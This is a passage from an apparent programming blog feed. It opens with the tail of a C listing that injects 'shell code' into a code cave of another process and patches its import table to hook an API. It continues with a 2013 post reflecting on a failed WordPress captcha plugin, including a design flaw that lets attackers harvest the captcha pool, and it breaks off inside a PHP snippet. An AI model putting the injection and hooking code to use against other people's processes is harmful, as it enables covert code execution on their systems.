<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"[i] Code cave found.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Write the shell code into the code cave :) */</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">WriteProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">LPVOID</span><span class="p">)</span><span class="n">pHandler</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">LPCVOID</span><span class="p">)</span><span class="n">handlerBuf</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">handlerSize</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">nBytesWritten</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"[!] Couldn't write shell code. Wrote %d bytes instead of %d...</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">nBytesWritten</span><span class="p">,</span><span class="w"> </span><span class="n">handlerSize</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"[i] Handler written to address 0x%x!</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">pHandler</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Patch the IAT with a pointer to the handler */</span><span class="w"></span>
<span class="w"> </span><span class="n">pHookContext</span><span class="o">-></span><span class="n">oldFuncPointer</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">PatchIAT</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">imageImportDirectory</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">DWORD</span><span class="p">)((</span><span class="n">PPEB</span><span class="p">)</span><span class="n">pPEP</span><span class="p">)</span><span class="o">-></span><span class="n">ImageBaseAddress</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">libName</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">funcName</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">DWORD</span><span class="p">)</span><span class="n">pHandler</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pHookContext</span><span class="o">-></span><span class="n">oldFuncPointer</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"[!] The specified API %s couldn't be located in the IAT</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">funcName</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* The hook should be sharp by now :) */</span><span class="w"></span>
<span class="w"> </span><span class="c1">//pHookContext->pOldFuncPointer =</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">pHookContext</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="n">BOOL</span><span class="w"></span>
<span class="nf">ReleaseHook</span><span class="p">(</span><span class="n">HANDLE</span><span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="n">HOOK_CONTEXT</span><span class="w"> </span><span class="o">*</span><span class="n">pHookContext</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">BOOL</span><span class="w"> </span><span class="n">bSuccess</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="cm">/* </span>
<span class="cm"> * Caller has to pass a pointer. Caller has to free() then the mem allocated here</span>
<span class="cm"> * buf is a pointer to a pointer. Otherwise we loose the mem. This is C magic... :/ </span>
<span class="cm"> */</span><span class="w"></span>
<span class="c1">// =============================================================================================</span>
<span class="n">BOOL</span><span class="w"></span>
<span class="nf">RetReadProcessMemory</span><span class="p">(</span><span class="n">OUT</span><span class="w"> </span><span class="n">PCHAR</span><span class="w"> </span><span class="o">*</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">HANDLE</span><span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="n">LPVOID</span><span class="w"> </span><span class="n">lpBaseAddress</span><span class="p">,</span><span class="w"> </span><span class="n">SIZE_T</span><span class="w"> </span><span class="n">sizeBuf</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">BOOL</span><span class="w"> </span><span class="n">bSuccess</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">oldProtect</span><span class="p">,</span><span class="w"> </span><span class="n">dummy</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">SIZE_T</span><span class="w"> </span><span class="n">numBytesRead</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="n">buf</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">calloc</span><span class="p">(</span><span class="n">sizeBuf</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">CHAR</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">buf</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"calloc() in RetReadProcessMemory() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mh">0x666</span><span class="p">;</span><span class="w"> </span><span class="c1">// Little hack here</span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">VirtualProtectEx</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">lpBaseAddress</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">sizeBuf</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">PAGE_READONLY</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">oldProtect</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"VirtualProtectEx() in RetReadProcessMemory() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Read finally the process memory */</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ReadProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">lpBaseAddress</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="n">buf</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">sizeBuf</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">numBytesRead</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"ReadProcessMemory() in RetReadProcessMemory() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Restore old memory protection constants */</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">VirtualProtectEx</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">lpBaseAddress</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">sizeBuf</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">oldProtect</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">dummy</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"VirtualProtectEx(RESTORING) in RetReadProcessMemory() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">TRUE</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="c1">// =============================================================================================</span>
<span class="n">BOOL</span><span class="w"></span>
<span class="nf">RetWriteProcessMemory</span><span class="p">(</span><span class="n">HANDLE</span><span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="n">LPVOID</span><span class="w"> </span><span class="n">lpBaseAddress</span><span class="p">,</span><span class="w"> </span><span class="n">LPCVOID</span><span class="w"> </span><span class="n">lpBuffer</span><span class="p">,</span><span class="w"> </span><span class="n">SIZE_T</span><span class="w"> </span><span class="n">nSize</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">BOOL</span><span class="w"> </span><span class="n">bSuccess</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">oldProtect</span><span class="p">,</span><span class="w"> </span><span class="n">dummy</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">SIZE_T</span><span class="w"> </span><span class="n">numBytesWritten</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">VirtualProtectEx</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">lpBaseAddress</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">nSize</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">PAGE_READWRITE</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">oldProtect</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"VirtualProtectEx() in RetWriteProcessMemory() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">WriteProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">lpBaseAddress</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">lpBuffer</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">nSize</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">numBytesWritten</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"WriteProcessMemory in WriteProcessMemory() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Restore old memory protection constants */</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">VirtualProtectEx</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">lpBaseAddress</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">nSize</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">oldProtect</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">dummy</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"VirtualProtectEx(RESTORING) in RetReadProcessMemory() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">TRUE</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>The dangers of a poorly planned project2013-11-21T00:48:00+01:002013-11-21T00:48:00+01:00Nikolai Tschachertag:incolumitas.com,2013-11-21:/2013/11/21/the-dangers-of-a-badly-planned-project/<h3>Preface</h3>
<p>Do you like to fiddle around with programming projects in your spare
time? And do you sometimes start endeavors ambitiously, but you never
actually finish them? Are you fucking tired of stacking unsuccessful
projects, doing mediocre work while never being thoroughly satisfied in
what you do?</p>
<p>If yes, you may be inclined to listen to some words I have to say over
my most recent failed project:</p>
<p>The idea was to create my own <em>little</em> captcha plugin for wordpress. You
can learn more about the idea by delving into some of my accompanying
investigations in the following blog posts:</p>
<ul>
<li><a href="http://incolumitas.com/2013/10/06/plotting-bezier-curves/">Plotting Bézier curves directly and with De Casteljau’s
algorithm</a></li>
<li><a href="http://incolumitas.com/2013/10/16/create-your-own-font-the-hard-way/">Create your own font the hard
way!</a></li>
</ul>
<p>Honestly I started this project because back in the time I was using
<a href="wordpress.org/plugins/captcha/" title="captcha">this</a> plugin and I was
unsatisfied because for
<a href="http://incolumitas.com/2013/11/04/a-tale-of-a-twofold-broken-wordpress-captcha-plugin/" title="captcha is broken">these</a>
reason. So this context information hopefully points out some of my
motivations to start the project in the first place.</p>
<h3>The destiny of every badly planned project</h3>
<p>As with many spontaneously started projects in came up with in the past,
I first was convinced that it was an awesome idea and subsequently
started programming head-first without having a clear path or …</p><h3>Preface</h3>
<p>Do you like to fiddle around with programming projects in your spare
time? And do you sometimes start endeavors ambitiously, but you never
actually finish them? Are you fucking tired of stacking unsuccessful
projects, doing mediocre work while never being thoroughly satisfied in
what you do?</p>
<p>If yes, you may be inclined to listen to some words I have to say over
my most recent failed project:</p>
<p>The idea was to create my own <em>little</em> captcha plugin for wordpress. You
can learn more about the idea by delving into some of my accompanying
investigations in the following blog posts:</p>
<ul>
<li><a href="http://incolumitas.com/2013/10/06/plotting-bezier-curves/">Plotting Bézier curves directly and with De Casteljau’s
algorithm</a></li>
<li><a href="http://incolumitas.com/2013/10/16/create-your-own-font-the-hard-way/">Create your own font the hard
way!</a></li>
</ul>
<p>Honestly I started this project because back in the time I was using
<a href="wordpress.org/plugins/captcha/" title="captcha">this</a> plugin and I was
unsatisfied because for
<a href="http://incolumitas.com/2013/11/04/a-tale-of-a-twofold-broken-wordpress-captcha-plugin/" title="captcha is broken">these</a>
reason. So this context information hopefully points out some of my
motivations to start the project in the first place.</p>
<h3>The destiny of every badly planned project</h3>
<p>As with many spontaneously started projects in came up with in the past,
I first was convinced that it was an awesome idea and subsequently
started programming head-first without having a clear path or at least a
slight vision of what the project should look like in the end.</p>
<p>But after reaching first milestones, it slowly began to dawn on me that
there might be several issues inherent to the architecture and concept
itself. This kind of coming back down to earth with a bang is nothing
new for me, actually it's a pattern I observed several times in the
past.</p>
<p>It's really annoying, because you invested blood, sweat and tears into
your project. Let me analyze how such a idea get's wrecked over its
unfortunate evolution:</p>
<h3>Avoid quickstarts</h3>
<p>The first development stage of a fresh project is mostly euphorically:
You're able to make progress virtually without making big efforts. You
just code thoughtlessly without having the big picture in front of you.<br>
The reason for that is, that your motivation is intrinsic and you don't
have to convince yourself that what you are doing is right; you're just
doing it.<br>
In this phase, you're unconsciously laying the foundation of your
project (Defining classes, choosing a concrete design pattern) and the
quality and solidness of what you do <em>now</em> determines the amount of
headache and time you have to invest <em>later</em> to fix architectural
mistakes.<br>
<strong>Learn:</strong> Before you begin to write a single line of code, make sure
that you can answer the following questions: Am I implementing something
that I will actively user later, or am I just doing it for the learning
sake? Is the end product important, or the path itself?</p>
<h3>Use existing solutions</h3>
<p>If you are like me, then you love to do reinvent things: Rasterizing
Bézier curves? Plotting Lines? Writing PNG's (Involves the whole
re-implementation of the pretty complex PNG specification)? Should I use
ImageMagick? Nahh, let's not use a imaging library, let's do it on my
own!<br>
The avoidance of a imaging library is a concrete example and a part of
the reason for the failure of my aforementioned project idea.<br>
Reinventing and re-implementing essential building blocks is mostly a
bad idea!<br>
Don't get me wrong: Doing so is highly educational and in the process
you're going to learn a hell of a lot (Example: How else would I know
now how to approximate the derivation of n-th order bezier curves
numerically with the Newton-Raphson algorithm?).<br>
But if you create elemental code on your own, you should either have
professional knowledge of the subject or a huge willpower/effort and
most importantly, lots of time on your hand, to invest into your
endeavor.</p>
<p><strong>Understand:</strong> Ask yourself whether you want to focus on the unique,
innovative part of your application, that needs to absorb all of your
imagination and creativity, or if you prefer spending a lot of time on
parts that already exist in a better form than you would ever be able to
do it?<br>
It's mostly a rhetorical question, but the paradoxical part lies here:
If you never appreciate the thinking process that accommodates the
building process of a elemental software block and you always do the
part that's completely new, you mightn't learn <em>enough</em> to do actually a
worthy, unique and new part. The road to a brilliant idea is paved by
many failures and dull re-implementations of existing ideas!</p>
<h3>Do not bury your aborted ideas.</h3>
<p>It's bad, believe me.<br>
You don't need to pursue a project at all costs even though it was
doomed to fail right from the beginning. But if you try to forget it and
let your code rot in some shady places on your hard-drive, you're
unconsciously reinforcing a very bad feeling: That you still have
something to complete, but you do not really know what.<br>
Make a clear decision to finish your project. Just mark it as completed
and as a failure, but put an end to it! This allows you to start over
and do better in the future! Not everything needs to be a success. Most
projects end as a failure. Such is life!</p>
<h3>Rethinking about motivation and discipline</h3>
<p>In being fully aware of the danger of sounding corny (Does this word fit
here?): You only need to be right very few times in life:</p>
<ul>
<li>Theoretically, you need to command up the courage only once to find
the woman of your life.</li>
<li>You only need to try very few times in your life to apply for a job
of your dreams.</li>
<li>Once realized that Python is the very best programming language (In
combination with C) you don't need wasting your precious time on
other languages anymore ;)</li>
</ul>
<p>You can endure thousand failures, but if you just succeed once with an
idea, you made it.<br>
If there's a single project that doesn't end in the corner of failures,
you succeeded! So every stranding you encounter in life brings you
closer to a success. The worst thing you can do: Stop trying.<br>
I honestly don't think that this is motivational nonsense: Try hard
enough, end you eventually succeed. As simple as that.<br>
<strong>Learn:</strong> Be aware of motivation. Everybody is motivated. Anyone wants
to get in formidable physical shape, learn a lot and achieve great
things. But only few to so. It's not a question of intellectual ability
and fluid intelligence that keeps you from reaching mastery, it's the
addiction of being comfortable and shirking, that makes it impossible
for you to do what you want.<br>
Ask yourself: Who will rise higher: A committed, hard working,
averagely gifted person, that spends a year on a particular task, or a
genius that expects from himself to do great things in a short time?</p>
<h3>Getting concrete: What was wrong with my idea? And what did I actually learn?</h3>
<p>The initial idea was to make a (nother) Captcha plugin for Wordpress.</p>
<p>Maybe the first mistake was to consider doing my own version, without
even inspecting the existing solutions.<br>
But there are quite some good wordpress captcha plugins out there. For
instance the one I am using now: It prevents all forms of spam so far
and fulfills its purpose perfectly.<br>
That's all you expect from such a plugin.<br>
A <a href="http://wordpress.org/plugins/search.php?q=captcha" title="captcha alternatives">quick
search</a>
yields many good alternatives that I wasn't aware of.</p>
<p>Furthermore, I wanted to to everything on my own: Rasterizing my own
lines (Bresenham line algorithm, Midpoint algorithm), plotting Bézier
splines on my own (Casteljau's algorithm, several different
approximations, ...), generating bitmap graphics on my own and I could
continue this list indefinitely.</p>
<p>All these patchwork approaches ended in a very unstable captcha
implementation on witch I couldn't built further. This meant, that every
future I tried to integrate, needed exhaustive debugging while
maintaining an general overview of where the bug could be possibly
situated.</p>
<p>To state an example: I tried to implement glyph filling. This involves
line/line and line/curve intersection checking. The algorithm that finds
the intersection point needs the roots of Bézier curves (Which were
cubic in my case).<br>
Thus I had to implement the Raphson-Newton algorithm in order to
compute the roots. That alone was a new field for me. But combined with
my repulsion for PHP and a really unstable testing environment (I could
have made a better debugging environment, but apparently I was to lazy),
it was a pain in the ass to implement things correctly.</p>
<p>I soon started to solve the problems in Python and after the logic was
working there, ported it back to PHP. I did so simply out of the reason
that debugging the plugin directly, involved generating bitmap captchas
every run, which was a rather tedious process. Hence I underestimated
the complexity completely and failed to set up a productive environment
(I better don't start elaborating on my attempts to get xdebug installed
in a xampp environment).</p>
<p>While the former issue wasn't the reason I decided to stop the
development, there were other problems with the architecture itself:</p>
<p>My captcha plugin calculates randomly placed splines and glyphs on a
bitmap (that constitute the glyphs) and saves the rather large (no
compression) netbpm bitmap file on disk, which is then converted to a
PNG with the command line utility pnmtopng. </p>
<p>All this requires a lot memory and CPU power, since the algorithms to
rasterize lines and Bézier splines are rather expensive. Therefore I
just fire the captcha factory once in intervals of 2 hours (With web
cronjobs or real cronjobs if necessary) in order to feed a finite pool
of captcha images, that's is slowly but constantly renewing itself.<br>
All users that visit the plugin, get a randomly chosen captchas served.
But this approach exhibits a big drawback: The captcha exists to prevent
spammers from posting comments. But due to this captcha-image-pool
design, every malicious user could just request a large amount of
captchas until he obtains the majority of captchas in the pool. Then he
could manually map the obtained pictures to it's solution and teach his
attacking script the answer and BOOM the captcha is bypassed.<br>
Of course he'd need to update the mappings every two hours, but this
wouldn't hinder a motivated attacker to do so.</p>
<p>In short: Because plotting bitmaps and computing splines is a very
expensive task, I simply can't manufacture fresh captchas for every
user. I need to have a collection of pre built captcha pictures that are
randomly chosen to be presented to visitors. But this is a weak design
from a security point of view.<br>
Although there are countermeasures, they cannot neutralize the root
problem and hinder evil mind's from finding a circumvention.</p>
<p>Here have an example of how I implemented that "pool feeding":</p>
<div class="highlight"><pre><span></span><code><span class="x">/*</span>
<span class="x"> * Only the cronjob calls this file directly. The cronjob must have the same</span>
<span class="x"> * IP address as the webserver, otherwise it won't be executed. This prevents</span>
<span class="x"> * users from calling this file directly and DDOSing the server</span>
<span class="x"> */</span>
<span class="x">if (basename(__FILE__) == basename($_SERVER["SCRIPT_FILENAME"])) {</span>
<span class="x"> if (in_array($_SERVER['REMOTE_ADDR'], array('127.0.0.1', '::1'))) {</span>
<span class="x"> require_once('cunning_captcha_lib.php');</span>
<span class="x"> /* Bring the wordpress API into play */</span>
<span class="x"> define('WP_USE_THEMES', false);</span>
<span class="x"> require('../../../wp-blog-header.php'); /* Assuming we're in plugin directory */</span>
<span class="x"> ccaptcha_feed_pool(); /* Feed the little monster */</span>
<span class="x"> } else {</span>
<span class="x"> wp_die(__('Error: Dont call CunningCaptcha directly. It does not like it :(.', 'CunningCaptcha'));</span>
<span class="x"> }</span>
<span class="x">}</span>
<span class="x">// ...</span>
<span class="x">/*</span>
<span class="x"> * Adds new captcha images to the pool.</span>
<span class="x"> */</span>
<span class="x">function ccaptcha_feed_pool() {</span>
<span class="x"> /* First of all check if pnmtopng is available on the system */</span>
<span class="x"> $handle = popen('/usr/bin/which pnmtopng 2>&1', 'r');</span>
<span class="x"> $read = fread($handle, 2096);</span>
<span class="x"> pclose($handle);</span>
<span class="x"> if (!file_exists(trim($read))) {</span>
<span class="x"> print("pnmtopng is not installed on the system.");</span>
<span class="x"> return false;</span>
<span class="x"> }</span>
<span class="x"> /* Check if target dir exists, if not, create it */</span>
<span class="x"> if (!file_exists(trailingslashit(TARGET_DIR)) && !is_dir(trailingslashit(TARGET_DIR))) {</span>
<span class="x"> if (!mkdir(trailingslashit(TARGET_DIR), $mode = 0755))</span>
<span class="x"> print("Couldn't create image directory");</span>
<span class="x"> return false;</span>
<span class="x"> }</span>
<span class="x"> /* If there are no png files in the target directory, unset the option */</span>
<span class="x"> if (false === strpos(implode('', array_values(scandir(trailingslashit(TARGET_DIR)))), 'png')) {</span>
<span class="x"> echo "deleted options";</span>
<span class="x"> delete_option('ccaptcha_path_captcha_a');</span>
<span class="x"> }</span>
<span class="x"> $captchas = cclib_generateCaptchas($path = trailingslashit(TARGET_DIR), $number = 10, $captchalength = 5);</span>
<span class="x"> /* Convert them to png using pnmtopng */</span>
<span class="x"> foreach (array_keys($captchas) as $path) {</span>
<span class="x"> $path = escapeshellarg($path);</span>
<span class="x"> system(sprintf("pnmtopng %s > %s && rm %s;", $path . '.ppm', $path . '.png', $path . '.ppm'));</span>
<span class="x"> }</span>
<span class="x"> /*</span>
<span class="x"> * If the pool size is now too large, delete the superfluous (redundant) files from the directory</span>
<span class="x"> * and the options database.</span>
<span class="x"> */</span>
<span class="x"> $cnt = 0;</span>
<span class="x"> foreach (glob(trailingslashit(TARGET_DIR) . "*.png") as $filename) {</span>
<span class="x"> $filetimes[$filename] = filectime($filename);</span>
<span class="x"> $cnt++;</span>
<span class="x"> }</span>
<span class="x"> if ($cnt > POOL_SIZE) {</span>
<span class="x"> $num_to_delete = $cnt - POOL_SIZE;</span>
<span class="x"> /* Sort the array by value (unix timestamp) */</span>
<span class="x"> if (!asort($filetimes, SORT_NUMERIC)) {</span>
<span class="x"> print("couldn't sort images by modification time.");</span>
<span class="x"> return false;</span>
<span class="x"> }</span>
<span class="x"> $keys = array_keys($filetimes);</span>
<span class="x"> $savedcaptchas = get_option('ccaptcha_path_captcha_a'); /* This array cannot (should't) be empty */</span>
<span class="x"> foreach (range(0, $num_to_delete - 1) as $i) {</span>
